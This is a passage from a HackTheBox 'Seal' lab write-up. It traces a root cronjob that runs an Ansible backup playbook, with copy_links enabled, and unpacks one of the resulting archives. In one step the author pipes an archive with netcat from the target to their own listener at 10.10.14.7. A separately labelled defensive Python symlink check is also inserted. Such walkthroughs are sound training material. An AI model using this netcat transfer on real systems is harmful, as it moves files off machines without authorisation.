Ansible
As discovered through PSPY, one of the root cronjob processes turns out to be executing a binary located at /usr/bin/ansible-playbook with the /opt/backups/playbook/run.yml file as its argument, running with the privileges of the luis user.
tomcat@seal:/var/lib/tomcat9$ ll /usr/bin/ansible-playbook
0 lrwxrwxrwx 1 root root 7 Mar 16 2020 /usr/bin/ansible-playbook -> ansible
tomcat@seal:/var/lib/tomcat9$ file /usr/bin/ansible-playbook
/usr/bin/ansible-playbook: symbolic link to ansible
Checking the binary itself reveals that it is a symbolic link to another command, ansible.
tomcat@seal:/var/lib/tomcat9$ which ansible
/usr/bin/ansible
tomcat@seal:/var/lib/tomcat9$ ll /usr/bin/ansible
4.0K lrwxrwxrwx 1 root root 68 Mar 16 2020 /usr/bin/ansible -> ../lib/python3/dist-packages/ansible/cli/scripts/ansible_cli_stub.py
The ansible binary is located at /usr/bin/ansible and is itself a symbolic link to a Python script.
The Python script is located at /usr/lib/python3/dist-packages/ansible/cli/scripts/ansible_cli_stub.py
/opt/backups
tomcat@seal:/opt/backups$ ll
total 16K
4.0K drwxr-xr-x 4 luis luis 4.0K Apr 11 16:47 .
4.0K drwxrwxr-x 2 luis luis 4.0K Apr 11 16:47 archives
4.0K drwxrwxr-x 2 luis luis 4.0K May 7 2021 playbook
4.0K drwxr-xr-x 3 root root 4.0K May 7 2021 ..
The /opt/backups directory has 2 sub-directories, one of which (playbook) holds the file used by the root cronjob process.
/opt/backups/playbook/run.yml
tomcat@seal:/opt/backups/playbook$ ll
total 12K
4.0K drwxr-xr-x 4 luis luis 4.0K Apr 11 16:58 ..
4.0K drwxrwxr-x 2 luis luis 4.0K May 7 2021 .
4.0K -rw-rw-r-- 1 luis luis 403 May 7 2021 run.yml
tomcat@seal:/opt/backups/playbook$ cat run.yml
- hosts: localhost
  tasks:
  - name: Copy Files
    synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
  - name: Server Backups
    archive:
      path: /opt/backups/files/
      dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"
  - name: Clean
    file:
      state: absent
      path: /opt/backups/files/
This is the YAML file that gets fed as an argument to /usr/bin/ansible-playbook. It contains the task definitions for a backup operation.
The source directory is /var/lib/tomcat9/webapps/ROOT/admin/dashboard, which is served as the /admin/dashboard directory over HTTPS. The synchronize task copies it (with copy_links=yes, so symbolic links are followed and their targets copied) into a staging directory, /opt/backups/files.
The destination directory for the resulting archive is set to /opt/backups/archives, after which the staging directory is removed.
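As an added example (not part of the writeup or of Ansible itself), a pre-backup check for what copy_links=yes implies: the synchronize task follows every symbolic link in the source tree and copies the target's contents, so a backup job like this one should first verify that no link under the source directory resolves outside it. The directory names in the demo are constructed.

```python
import os
import tempfile
from pathlib import Path


def escaping_links(src_root):
    """Walk src_root the way rsync --copy-links would (following every
    symlink) and return the links whose real target lies outside src_root.
    Each entry is (link path relative to src_root, resolved target)."""
    root = Path(src_root).resolve()
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            p = Path(dirpath) / name
            if not p.is_symlink():
                continue
            target = p.resolve()  # also follows chained links
            try:
                target.relative_to(root)  # raises if target is outside root
            except ValueError:
                found.append((str(p.relative_to(root)), str(target)))
    return found


def demo():
    """Constructed tree (assumption: names chosen for illustration): a
    dashboard directory with one harmless internal link in uploads/ and one
    link that escapes the tree. Returns the links the check would reject."""
    base = Path(tempfile.mkdtemp())
    src = base / "dashboard"
    (src / "uploads").mkdir(parents=True)
    (src / "css").mkdir()
    (src / "index.html").write_text("<html></html>\n")
    (base / "outside").mkdir()
    (base / "outside" / "private").write_text("not meant for the backup\n")
    os.symlink(src / "css", src / "uploads" / "css-link")  # stays inside
    os.symlink(base / "outside", src / "uploads" / "esc")  # escapes
    return escaping_links(src)


if __name__ == "__main__":
    for link, target in demo():
        print(f"refusing backup: {link} -> {target}")
```

A playbook could run this check in a task before the synchronize step and fail the play when the list is non-empty.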
/opt/backups/archives
tomcat@seal:/opt/backups$ cd archives ; ll
total 2.4M
4.0K drwxr-xr-x 4 luis luis 4.0K Apr 11 16:48 ..
592K -rw-rw-r-- 1 luis luis 592K Apr 11 16:48 backup-2023-04-11-16:48:32.gz
4.0K drwxrwxr-x 2 luis luis 4.0K Apr 11 16:48 .
592K -rw-rw-r-- 1 luis luis 592K Apr 11 16:47 backup-2023-04-11-16:47:32.gz
592K -rw-rw-r-- 1 luis luis 592K Apr 11 16:46 backup-2023-04-11-16:46:32.gz
592K -rw-rw-r-- 1 luis luis 592K Apr 11 16:45 backup-2023-04-11-16:45:32.gz
There are 4 backup archives, generated by the cronjob running the ansible-playbook script with the YAML file above.
tomcat@seal:/opt/backups/archives$ nc 10.10.14.7 2222 < backup-2023-04-11-16:50:32.gz
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ nnc 2222 > backup-2023-04-11-16:50:32.gz
listening on [any] 2222 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.250] 56036
I copied one of the archives to Kali to check it out
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ gunzip backup-2023-04-11-16:50:32.gz
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ ls
backup-2023-04-11-16:50:32
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ file backup-2023-04-11-16:50:32
backup-2023-04-11-16:50:32: POSIX tar archive
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ tar xf backup-2023-04-11-16:50:32
tar: Cannot connect to backup-2023-04-11-16: resolve failed
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ tar -xf backup-2023-04-11-16:50:32 --force-local
It is a gzip-compressed tar archive. I had to use the --force-local flag so that tar would treat the filename as a local file, as it contains those colons (:).
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ cd dashboard/ ; ll
total 100K
4.0K drwxr-xr-x 5 kali kali 4.0K Apr 11 18:56 bootstrap
4.0K drwxr-xr-x 2 kali kali 4.0K Apr 11 18:56 css
4.0K drwxr-xr-x 4 kali kali 4.0K Apr 11 18:56 images
4.0K drwxr-xr-x 3 kali kali 4.0K Apr 11 18:56 ..
4.0K drwxr-xr-x 4 kali kali 4.0K Apr 11 18:56 scripts
4.0K drwxr-xr-x 7 kali kali 4.0K May 7 2021 .
4.0K drwxr-xr-x 2 kali kali 4.0K May 7 2021 uploads
72K -rw-r--r-- 1 kali kali 71K May 6 2021 index.html
The content is indeed the /admin/dashboard directory.